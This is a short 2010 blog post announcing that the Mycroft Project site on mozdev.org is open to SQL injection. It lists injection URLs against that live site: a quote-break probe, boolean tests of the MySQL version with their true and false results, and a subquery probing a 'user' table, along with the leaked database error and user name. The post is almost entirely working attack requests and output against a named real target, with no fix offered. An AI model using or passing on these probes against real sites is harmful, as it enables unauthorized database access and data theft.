Monday, August 23, 2010

Mycroft Project vulnerable to sql injection

Mycroft Project is vulnerable to sql injection.

Injection:

http://mycroft.mozdev.org/search-engines.html?category=64'













Mysql version check:

http://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true


http://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false


Error generated looking for inexistent user table:

http://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'

No comments:

Post a Comment